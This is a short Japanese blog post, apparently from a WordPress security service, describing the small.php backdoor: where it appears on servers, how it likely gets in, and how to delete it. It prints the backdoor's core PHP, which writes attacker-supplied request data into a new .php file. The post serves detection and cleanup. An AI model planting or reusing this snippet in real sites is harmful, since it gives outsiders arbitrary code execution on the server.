昨今拡大しているマルウェアであるsmall.phpについて解説いたします。

ワードプレスのサーバーの様々なフォルダに作成されるsmall.php

このマルウェアは、サーバー上のあらゆるフォルダにsmall.phpというファイル名で、バックドアを生成いたします。ワードプレスサイトのデータがあるpublic htmlより上のフォルダにも作成されている場合がございます。

コードの例は下記のようなものとなっており非常に単純です。

$f = fopen('ランダムな文字'.'.php',"w");
fputs($f,$_REQUEST['ランダムな文字']);
fclose($f);

インターネット経由で送られたプログラムをランダムな文字列の名称でサーバー内に作成して保存するバックドアと呼ばれる種類のマルウェアです。

small.phpはどこから埋め込まれた?

このファイルがサーバー上に生成されているということは、ワードプレスの脆弱性のあるプラグインを利用してハッキングされたか、管理者権限を奪取されて書き込まれたか、ほかのバックドア経由で書き込まれた可能性が高いです。

small.phpの対処方法

ワードプレスのファイルには、一般的にはsmall.phpというファイルはございません。
このため、ワードプレスのフォルダー内のどこかに、small.phpというものがございましたら、マルウェアを疑ってもよいかと存じます。

また、ワードプレスがあるフォルダより上のフォルダにまでこのファイルが多数書き込まれている事例がございます。このファイルは外部アクセスすらできませんのでマルウェアであればすぐに削除されることをお勧めいたします。

また、
【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
にてSmall.phpマルウェアを検出・駆除可能です。

WordPress ワードプレスのマルウェア駆除・セキュリティー対策のご依頼ご相談はワードプレスドクターまでお気軽にお送りください

関連記事:

  1. ワードプレスのマルウェア ランダムな半角英数のフォルダに大量のHTMLファイルの不正なホスト
    ワードプレスがハッキングされ、ランダムな半角英数のフォルダに、大量の不正なファイルが勝手にホストされるという事例が増えていますのでこのタイプの改ざんにつきまして解説いたします。...
  2. ワードプレスで$_HEADERSにマルウェアコードを仕込むバックドアの事例
    昨今検出が非常に増えている$_HEADERS にマルウェアのコード本体を仕込むタイプのバックドアについて解説いたします...
  3. ワードプレスがマルウェアを駆除しても再度感染(再改ざん)される5つの大きな理由
    ワードプレスサイトのマルウェアの再感染は、サイト運営者にとっては、サイトの運営に支障をきたす期間を長くし、クライアント様とのトラブルを引き起こすこともあり最も避けたいことかと存じます。 ここでは再感染を引き起こす5つの主要な要因について解説したいと思います。...
  4. ワードプレスのインジェクション攻撃って何?
    ワードプレスがハッキングされる手法には様々なものがありますが、最も多いのがインジェクション攻撃と呼ばれる攻撃です。このインジェクション攻撃について解説いたします。...
  5. ワードプレスがハッキング・改ざん・乗っ取りされた際にユーザー向けに行うべきこと
    ワードプレスが改ざんされて、別のサイトにリダイレクトされる、懸賞サイトに飛ばされる、不正なファイルのダウンロードをされる等、サイトに訪ねてくれたユーザーに被害が及ぶ可能性がある場合にユーザー向け(サイトを利用してくれる方)にどのように対応したらよいかを解説いたします。...
  6. ワードプレスドクター 依頼事例:ワードプレスに感染したマルウェアファイルの解析レポート作成
    ワードプレスドクターでは、50万ファイル近くのマルウェアファイルのサンプルを保有しており、日々ワードプレスのマルウェアの活動について研究しています。 この度は、マルウェアファイルの難読化解除と、マルウェアの動作の仕組みの解析のご依頼を頂いた事例をご紹介いたします。...